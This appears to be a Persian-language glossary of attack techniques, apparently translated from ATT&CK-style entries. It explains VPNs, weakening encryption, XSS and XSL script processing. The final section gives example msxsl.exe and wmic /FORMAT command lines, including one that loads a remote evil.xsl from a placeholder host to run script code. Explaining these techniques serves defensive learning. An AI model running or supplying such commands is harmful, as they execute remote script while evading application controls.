VPN) Virtual Private Network(

با اتصال از طریق VPN، تمام داده‌هایی که ارسال و دریافت می‌کنید از طریق یک "تونل" رمزگذاری شده عبور می‌کنند تا هیچ‌کس نتواند آنچه را که ارسال می‌کنید ببیند یا اگر آن‌ها را به دست آورد، آن‌ها را رمزگشایی کند. VPN ها همچنین به شما این امکان را می دهند که مکان فیزیکی و آدرس IP خود را مخفی کنید و به جای آن اغلب آدرس IP سرویس VPN را نمایش می دهید.

تضعیف رمزگذاری

Weaken Encryption

دشمنان ممکن است قابلیت رمزگذاری دستگاه شبکه را به خطر بیاندازند تا از رمزگذاری عبور کنند که در غیر این صورت از ارتباطات داده محافظت می کند. از رمزگذاری می توان برای محافظت از ترافیک شبکه انتقال یافته برای حفظ محرمانه بودن (محافظت در برابر افشای غیرمجاز) و یکپارچگی (محافظت در برابر تغییرات غیرمجاز) استفاده کرد. رمزهای رمزگذاری برای تبدیل یک پیام متنی ساده به متن رمزی استفاده می‌شوند و می‌توانند از نظر محاسباتی برای رمزگشایی بدون کلید رمزگشایی مرتبط، فشرده باشند. به طور معمول، کلیدهای طولانی تر، هزینه های رمزگشایی یا رمزگشایی بدون کلید را افزایش می دهند.دشمنان می توانند دستگاه هایی را که ترافیک شبکه را رمزگذاری می کنند به خطر بیاندازند و دستکاری کنند. به عنوان مثال، از طریق رفتارهایی مانند اصلاح تصویر سیستم، کاهش فضای کلید، و غیرفعال کردن سخت افزار کریپتو، یک دشمن می تواند تأثیر منفی داشته باشد و/یا توانایی دستگاه را برای رمزگذاری ایمن ترافیک شبکه از بین ببرد. این امر خطر بیشتری برای افشای غیرمجاز دارد و ممکن است به تسهیل دستکاری داده ها، دسترسی به اعتبار یا تلاش های جمع آوری کمک کند.

برنامه نویسی بین سایت

XSS(Cross-Site Scripting)

برنامه نویسی بین سایت (XSS) نوعی آسیب‎پذیری امنیتی است که در برخی از برنامه‌های وب یافت می‌شود. حملات XSS مهاجمان را قادر می‌سازد تا اسکریپت‌های سمت مشتری را به صفحات وب مشاهده شده توسط سایر کاربران تزریق کنند. مهاجمان می‌توانند از آسیب‌پذیری اسکریپت‌نویسی بین سایتی برای دور زدن کنترل‌های دسترسی مانند خط مشی همان منبع استفاده کنند.

پردازش اسکریپت XSL

XSL Script Processing

دشمنان ممکن است با جاسازی اسکریپت ها در فایل های XSL، کنترل برنامه را دور بزنند و اجرای کد را مبهم کنند. فایل های Extensible Stylesheet Language (XSL) معمولاً برای توصیف پردازش و ارائه داده ها در فایل های XML استفاده می شوند. برای پشتیبانی از عملیات پیچیده، استاندارد XSL شامل پشتیبانی از برنامه نویسی تعبیه شده در زبان های مختلف است. ممکن است دشمنان از این عملکرد برای اجرای فایل های دلخواه سوء استفاده کنند و در عین حال کنترل برنامه را دور بزنند. مشابه اجرای Trusted Developer Utilities Proxy Execution، باینری ابزار تبدیل خط مشترک مایکروسافت (msxsl.exe)را می توان برای اجرای جاوا اسکریپت مخرب تعبیه شده در فایل های XSL محلی یا راه دور (به URL مرجع) نصب و استفاده کرد. از آنجایی که msxsl.exe به طور پیش فرض نصب نشده است، دشمن احتمالاً باید آن را با فایل های حذف شده بسته بندی کند. Msxsl.exe دو آرگومان اصلی دارد، یک فایل منبع XML و یک شیوه نامه .XSL از آنجایی که فایل XSL XML معتبر است، حریف ممکن است یک فایل XSL را دو بار فراخوانی کند. هنگام استفاده از msxsl.exe، دشمنان ممکن است به فایل‌های XML/XSL یک پسوند فایل دلخواه بدهند. نمونه‌های خط فرمان: msxsl.exe customers[.]xml script[.]xsl msxsl.exe script[.]xsl script[.]xsl msxsl.exe script[.]jpeg script[.]jpeg یکی دیگر از انواع این تکنیک، به نام Squiblytwo، شامل استفاده از ابزار مدیریت ویندوز برای فراخوانی JScript یا VBScript در یک فایل XSL است.این تکنیک همچنین می‌تواند اسکریپت‌های محلی/راه‌دور را اجرا کند و مانند همتای خود Regsvr32/ ، از یک ابزار ویندوزی قابل اعتماد و داخلی بهره می‌برد. دشمنان ممکن است از هر نام مستعار موجود در Windows Management Instrumentation سوء استفاده کنند، مشروط بر اینکه از سوئیچ /FORMAT استفاده کنند. نمونه‌های خط فرمان: Local File: wmic process list /FORMAT:evil[.]xsl Remote File: wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"